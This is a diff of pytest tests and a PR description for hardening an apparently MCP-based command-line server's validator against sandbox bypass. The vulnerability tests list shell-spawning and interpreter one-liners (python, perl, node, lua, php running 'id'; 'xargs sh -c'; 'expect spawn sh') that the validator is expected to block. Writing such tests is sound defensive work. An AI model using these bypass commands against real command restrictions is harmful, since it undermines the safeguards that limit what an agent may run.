+def test_xargs_with_I_flag_sh(default_cmd_lists):
+    """xargs -I{} sh must be blocked (flag before interpreter)."""
+    _blocked(default_cmd_lists, "echo id | xargs -I{} sh -c")
+
+
+def test_xargs_with_max_args_sh(default_cmd_lists):
+    """xargs --max-args=1 sh must be blocked."""
+    _blocked(default_cmd_lists, "echo x | xargs --max-args=1 sh")
 
 
 # ---------------------------------------------------------------------------

--- a/tests/test_security_vulnerabilities.py
+++ b/tests/test_security_vulnerabilities.py
@@ -33,6 +33,32 @@ def _blocked(cmd_lists, command):
     )
 
 
+def _explicitly_blocked(cmd_lists, command):
+    """Assert a command is explicitly blocked (not just 'unsupported').
+
+    Commands that are merely absent from all allowlists get rejected as
+    'not recognized'.  This helper verifies the stronger guarantee: the
+    command must appear in the blocked list and produce a 'blocked for
+    security reasons' error.
+    """
+    result = validate_command(
+        command,
+        cmd_lists["read"],
+        cmd_lists["write"],
+        cmd_lists["system"],
+        cmd_lists["blocked"],
+        cmd_lists["dangerous_patterns"],
+    )
+    assert result["is_valid"] is False, (
+        f"Expected '{command}' to be explicitly blocked, but it was allowed "
+        f"(type={result['command_type']})"
+    )
+    assert "blocked" in (result["error"] or "").lower(), (
+        f"Expected '{command}' to be explicitly blocked, "
+        f"but got: {result['error']}"
+    )
+
+
 # ---------------------------------------------------------------------------
 # V1 — awk sub-execution via system() and getline
 # ---------------------------------------------------------------------------
@@ -243,3 +269,66 @@ def test_glob_whitelist_no_partial_match():
     assert not is_directory_whitelisted("/tmpfiles/x", whitelisted), (
         "/tmp/* should not match /tmpfiles/x"
     )
+
+
+# ---------------------------------------------------------------------------
+# V7 — Direct interpreter invocation
+# Interpreters must be *explicitly* blocked (in blocked_commands), not merely
+# absent from allowlists.  The distinction matters: an absent command could be
+# added to an allowlist by a user, bypassing the safety net entirely.
+# ---------------------------------------------------------------------------
+
+
+def test_python3_direct_exec(default_cmd_lists):
+    """python3 must be explicitly blocked."""
+    _explicitly_blocked(
+        default_cmd_lists, "python3 -c '__import__(\"os\").system(\"id\")'"
+    )
+
+
+def test_python3_module_exec(default_cmd_lists):
+    """python3 -m must be explicitly blocked."""
+    _explicitly_blocked(default_cmd_lists, "python3 -m http.server")
+
+
+def test_python_direct_exec(default_cmd_lists):
+    """python must be explicitly blocked."""
+    _explicitly_blocked(default_cmd_lists, "python -c 'import os; os.system(\"id\")'")
+
+
+def test_perl_direct_exec(default_cmd_lists):
+    """perl must be explicitly blocked."""
+    _explicitly_blocked(default_cmd_lists, "perl -e 'system(\"id\")'")
+
+
+def test_ruby_direct_exec(default_cmd_lists):
+    """ruby must be explicitly blocked."""
+    _explicitly_blocked(default_cmd_lists, "ruby -e 'system(\"id\")'")
+
+
+def test_node_direct_exec(default_cmd_lists):
+    """node must be explicitly blocked."""
+    _explicitly_blocked(
+        default_cmd_lists,
+        "node -e 'require(\"child_process\").execSync(\"id\")'",
+    )
+
+
+def test_lua_direct_exec(default_cmd_lists):
+    """lua must be explicitly blocked."""
+    _explicitly_blocked(default_cmd_lists, "lua -e 'os.execute(\"id\")'")
+
+
+def test_php_direct_exec(default_cmd_lists):
+    """php must be explicitly blocked."""
+    _explicitly_blocked(default_cmd_lists, "php -r 'system(\"id\");'")
+
+
+def test_expect_direct_exec(default_cmd_lists):
+    """expect must be explicitly blocked (PTY hijacking)."""
+    _explicitly_blocked(default_cmd_lists, "expect -c 'spawn sh'")
+
+
+def test_script_direct_exec(default_cmd_lists):
+    """script must be explicitly blocked (PTY capture)."""
+    _explicitly_blocked(default_cmd_lists, "script -c 'id' /tmp/out")

--- a/tests/test_supported_functionality.py
+++ b/tests/test_supported_functionality.py
@@ -1,0 +1,290 @@
+"""Baseline tests for supported functionality.
+
+These tests document commands that must continue to work correctly.
+They use the real default configuration so any changes to command lists
+or dangerous patterns will be reflected here.
+"""
+
+import pytest
+from cmd_line_mcp.config import Config
+from cmd_line_mcp.security import validate_command
+
+
+@pytest.fixture
+def default_cmd_lists():
+    """Return command lists from the real default configuration."""
+    config = Config()
+    return config.get_effective_command_lists()
+
+
+def _valid(cmd_lists, command, expected_type):
+    """Assert a command is valid with the expected type."""
+    result = validate_command(
+        command,
+        cmd_lists["read"],
+        cmd_lists["write"],
+        cmd_lists["system"],
+        cmd_lists["blocked"],
+        cmd_lists["dangerous_patterns"],
+    )
+    assert result["is_valid"] is True, (
+        f"Expected '{command}' to be valid, got error: {result['error']}"
+    )
+    assert result["command_type"] == expected_type
+
+
+# ---------------------------------------------------------------------------
+# Read commands
+# ---------------------------------------------------------------------------
+
+
+def test_ls(default_cmd_lists):
+    _valid(default_cmd_lists, "ls -la", "read")
+
+
+def test_ls_path(default_cmd_lists):
+    _valid(default_cmd_lists, "ls /tmp", "read")
+
+
+def test_cat(default_cmd_lists):
+    _valid(default_cmd_lists, "cat /tmp/file.txt", "read")
+
+
+def test_grep(default_cmd_lists):
+    _valid(default_cmd_lists, "grep -r pattern /tmp", "read")
+
+
+def test_grep_pattern(default_cmd_lists):
+    _valid(default_cmd_lists, "grep 'search term' /tmp/file.txt", "read")
+
+
+def test_find_by_name(default_cmd_lists):
+    _valid(default_cmd_lists, 'find /tmp -name "*.txt"', "read")
+
+
+def test_find_by_type(default_cmd_lists):
+    _valid(default_cmd_lists, "find /tmp -type f -name '*.pdf'", "read")
+
+
+def test_find_maxdepth(default_cmd_lists):
+    _valid(default_cmd_lists, "find /tmp -maxdepth 2 -mtime -1", "read")
+
+
+def test_head(default_cmd_lists):
+    _valid(default_cmd_lists, "head -n 10 /tmp/file.txt", "read")
+
+
+def test_tail(default_cmd_lists):
+    _valid(default_cmd_lists, "tail -n 20 /tmp/file.txt", "read")
+
+
+def test_wc(default_cmd_lists):
+    _valid(default_cmd_lists, "wc -l /tmp/file.txt", "read")
+
+
+def test_sort(default_cmd_lists):
+    _valid(default_cmd_lists, "sort /tmp/file.txt", "read")
+
+
+def test_sort_numeric(default_cmd_lists):
+    _valid(default_cmd_lists, "sort -rn /tmp/file.txt", "read")
+
+
+def test_du(default_cmd_lists):
+    _valid(default_cmd_lists, "du -sh /tmp", "read")
+
+
+def test_df(default_cmd_lists):
+    _valid(default_cmd_lists, "df -h", "read")
+
+
+def test_pwd(default_cmd_lists):
+    _valid(default_cmd_lists, "pwd", "read")
+
+
+def test_whoami(default_cmd_lists):
+    _valid(default_cmd_lists, "whoami", "read")
+
+
+def test_date(default_cmd_lists):
+    _valid(default_cmd_lists, "date", "read")
+
+
+def test_env_bare(default_cmd_lists):
+    """env with no arguments (show environment) must remain valid."""
+    _valid(default_cmd_lists, "env", "read")
+
+
+# ---------------------------------------------------------------------------
+# Write commands
+# ---------------------------------------------------------------------------
+
+
+def test_mkdir(default_cmd_lists):
+    _valid(default_cmd_lists, "mkdir /tmp/newdir", "write")
+
+
+def test_touch(default_cmd_lists):
+    _valid(default_cmd_lists, "touch /tmp/file.txt", "write")
+
+
+def test_cp(default_cmd_lists):
+    _valid(default_cmd_lists, "cp /tmp/a.txt /tmp/b.txt", "write")
+
+
+def test_mv(default_cmd_lists):
+    _valid(default_cmd_lists, "mv /tmp/a.txt /tmp/b.txt", "write")
+
+
+def test_rm(default_cmd_lists):
+    _valid(default_cmd_lists, "rm /tmp/file.txt", "write")
+
+
+def test_chmod(default_cmd_lists):
+    _valid(default_cmd_lists, "chmod 644 /tmp/file.txt", "write")
+
+
+def test_echo(default_cmd_lists):
+    _valid(default_cmd_lists, "echo hello world", "write")
+
+
+def test_tar_create(default_cmd_lists):
+    _valid(default_cmd_lists, "tar -czf /tmp/archive.tar.gz /tmp/dir", "write")
+
+
+def test_tar_extract(default_cmd_lists):
+    _valid(default_cmd_lists, "tar -xzf /tmp/archive.tar.gz -C /tmp", "write")
+
+
+def test_gzip(default_cmd_lists):
+    _valid(default_cmd_lists, "gzip /tmp/file.txt", "write")
+
+
+def test_zip(default_cmd_lists):
+    _valid(default_cmd_lists, "zip /tmp/archive.zip /tmp/file.txt", "write")
+
+
+def test_unzip(default_cmd_lists):
+    _valid(default_cmd_lists, "unzip /tmp/archive.zip -d /tmp", "write")
+
+
+# ---------------------------------------------------------------------------
+# System commands
+# ---------------------------------------------------------------------------
+
+
+def test_ps(default_cmd_lists):
+    _valid(default_cmd_lists, "ps aux", "system")
+
+
+def test_ping(default_cmd_lists):
+    _valid(default_cmd_lists, "ping -c 1 localhost", "system")
+
+
+def test_curl(default_cmd_lists):
+    _valid(default_cmd_lists, "curl -s https://example.com", "system")
+
+
+def test_who(default_cmd_lists):
+    _valid(default_cmd_lists, "who", "system")
+
+
+# ---------------------------------------------------------------------------
+# Safe awk — text processing without execution
+# ---------------------------------------------------------------------------
+
+
+def test_awk_print_columns(default_cmd_lists):
+    """awk column extraction must remain valid."""
+    _valid(default_cmd_lists, "ls -la | awk '{print $1, $9}'", "write")
+
+
+def test_awk_conditional_filter(default_cmd_lists):
+    """awk conditional filtering must remain valid."""
+    _valid(default_cmd_lists, "cat /tmp/file | awk '{if($1>10) print $0}'", "write")
+
+
+def test_awk_field_separator(default_cmd_lists):
+    """awk with custom field separator must remain valid."""
+    _valid(default_cmd_lists, "awk -F: '{print $1}' /tmp/file", "write")
+
+
+def test_awk_arithmetic(default_cmd_lists):
+    """awk arithmetic must remain valid."""
+    _valid(default_cmd_lists, "awk '{sum += $1} END {print sum}' /tmp/file", "write")
+
+
+def test_awk_pattern_match(default_cmd_lists):
+    """awk pattern matching must remain valid."""
+    _valid(default_cmd_lists, "awk '/pattern/ {print $0}' /tmp/file", "write")
+
+
+# ---------------------------------------------------------------------------
+# Safe sed — substitution without /e flag
+# ---------------------------------------------------------------------------
+
+
+def test_sed_basic_substitution(default_cmd_lists):
+    """sed basic substitution must remain valid."""
+    _valid(default_cmd_lists, "sed 's/foo/bar/' /tmp/file", "write")
+
+
+def test_sed_global_substitution(default_cmd_lists):
+    """sed global substitution must remain valid."""
+    _valid(default_cmd_lists, "echo hello | sed 's/hello/world/g'", "write")
+
+
+def test_sed_case_insensitive(default_cmd_lists):
+    """sed case-insensitive substitution must remain valid."""
+    _valid(default_cmd_lists, "sed 's/foo/bar/i' /tmp/file", "write")
+
+
+def test_sed_line_range(default_cmd_lists):
+    """sed line range printing must remain valid."""
+    _valid(default_cmd_lists, "sed -n '1,5p' /tmp/file", "write")
+
+
+def test_sed_delete_lines(default_cmd_lists):
+    """sed line deletion must remain valid."""
+    _valid(default_cmd_lists, "sed '/^#/d' /tmp/file", "write")
+
+
+# ---------------------------------------------------------------------------
+# Pipelines
+# ---------------------------------------------------------------------------
+
+
+def test_pipeline_grep_sort_wc(default_cmd_lists):
+    _valid(default_cmd_lists, "cat /tmp/file | grep pattern | sort | wc -l", "read")
+
+
+def test_pipeline_find_grep(default_cmd_lists):
+    _valid(default_cmd_lists, "find /tmp -name '*.log' | grep error", "read")
+
+
+def test_pipeline_du_sort(default_cmd_lists):
+    _valid(default_cmd_lists, "du -h /tmp | sort -h", "read")
+
+
+def test_pipeline_ls_awk(default_cmd_lists):
+    _valid(default_cmd_lists, "ls -la /tmp | awk '{print $5, $9}'", "write")
+
+
+# ---------------------------------------------------------------------------
+# Safe xargs use
+# ---------------------------------------------------------------------------
+
+
+def test_xargs_grep(default_cmd_lists):
+    """xargs piped to grep must remain valid."""
+    _valid(default_cmd_lists, "find /tmp -name '*.txt' | xargs grep pattern", "system")
+
+
+def test_xargs_cat(default_cmd_lists):
+    """xargs piped to cat must remain valid."""
+    _valid(default_cmd_lists, "echo /tmp/file | xargs cat", "system")
+
+
+def test_xargs_wc(default_cmd_lists):
+    """xargs piped to wc must remain valid."""
+    _valid(default_cmd_lists, "find /tmp -name '*.txt' | xargs wc -l", "system")


### PR DESCRIPTION
## Summary

Closes #3

Hardens the security validation pipeline to block arbitrary command execution through trusted utilities (awk, sed, find, env, xargs, tar, etc.) that support sub-execution capabilities.

- Block `system()`, `exec()`, and command substitution in awk, sed `-e`, and find `-exec`/`-execdir`/`-ok`
- Block scripting language interpreters (python, ruby, perl, node, etc.) as direct commands
- Block system path writes via cp/mv and LD_PRELOAD/LD_LIBRARY_PATH injection
- Block sed alternate delimiters, awk coprocess (`|&`), and tar `-I` compression flag
- Harden env, xargs, and find patterns against flag and full-path evasion
- Bump version to 0.6.0 and split reference docs into `docs/`
- Add comprehensive vulnerability test suite (584 lines) and supported-functionality baseline tests (290 lines)

## Test plan

- [ ] `pytest tests/test_security_vulnerabilities.py` — all exploit vectors are blocked
- [ ] `pytest tests/test_supported_functionality.py` — legitimate usage still works
- [ ] `pytest` — full suite passes with no regressions